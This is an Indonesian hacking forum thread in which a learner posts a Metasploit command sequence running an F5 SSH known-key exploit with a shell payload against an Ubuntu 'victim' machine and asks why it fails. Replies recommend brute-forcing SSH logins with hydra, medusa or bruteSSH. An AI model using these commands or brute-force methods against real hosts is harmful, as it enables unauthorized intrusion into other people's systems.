hack ssh - ubuntu
#1
ass mas-mas brother, saya lg belajar hack ubuntu.

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf exploit(f5_bigip_known_privkey) > show payloads
msf exploit(f5_bigip_known_privkey) > set payload cmd/unix/interact
msf exploit(f5_bigip_known_privkey) > set lhost [IP saya]
msf exploit(f5_bigip_known_privkey) > set rhost [IP korban]
msf exploit(f5_bigip_known_privkey) > exploit

ko keluar error mulu ya :
[IP korban] SSH - authentication failed

kira - kira kenapa ya?
saya pakai backtrack5 R3 dan korban ubuntu 10.04.

#2
Port SSHnya Open ga ?
mungkin blom pernah di pake om, jadi SSHnya harus di generate dulu.. mungkin lo ya Big Grin

#3
coba pake hydra bro .. atau medusa Big Grin

#4
(05-01-2013, 11:22 AM)xsan-lahci Wrote: coba pake hydra bro .. atau medusa Big Grin

@drewcode : bisa klo pake putty ko, udah open berarti kan ya?

@xsan : wah ada cara nya ga mas?

-help appreciated-

(05-03-2013, 01:55 AM)franssinatra Wrote:
(05-01-2013, 11:22 AM)xsan-lahci Wrote: coba pake hydra bro .. atau medusa Big Grin

@drewcode : bisa klo pake putty ko, udah open berarti kan ya?

@xsan : wah ada cara nya ga mas?

-help appreciated-

kalo pake hydra termasuk exploit ga ya mas?

#5
coba cek SSH portnya dah open gak, baru coba deh sampe loginnya entah pake terminal ubuntu ato putty for linux, setelah itu biasanya ane pake bruteSSH om tinggal download aja tool di google Smile

#6
(05-03-2013, 01:55 AM)franssinatra Wrote:
(05-01-2013, 11:22 AM)xsan-lahci Wrote: coba pake hydra bro .. atau medusa Big Grin

@drewcode : bisa klo pake putty ko, udah open berarti kan ya?

@xsan : wah ada cara nya ga mas?

-help appreciated-

(05-03-2013, 01:55 AM)franssinatra Wrote:
(05-01-2013, 11:22 AM)xsan-lahci Wrote: coba pake hydra bro .. atau medusa Big Grin

@drewcode : bisa klo pake putty ko, udah open berarti kan ya?

@xsan : wah ada cara nya ga mas?

-help appreciated-

kalo pake hydra termasuk exploit ga ya mas?


KLo hydra itu brute force om Smile ada kok tutorialnya di sini..
klo mauliat vidionya mampir sini aja http://depankomputer.com/blog/brute-forc...toria.html

#7
iya ente harus brute user and Passwordnya,.
bener gak kang

#8
udah ada yng share disini .. maximalkan fasilitas search di forum ini





Users browsing this thread: 1 Guest(s)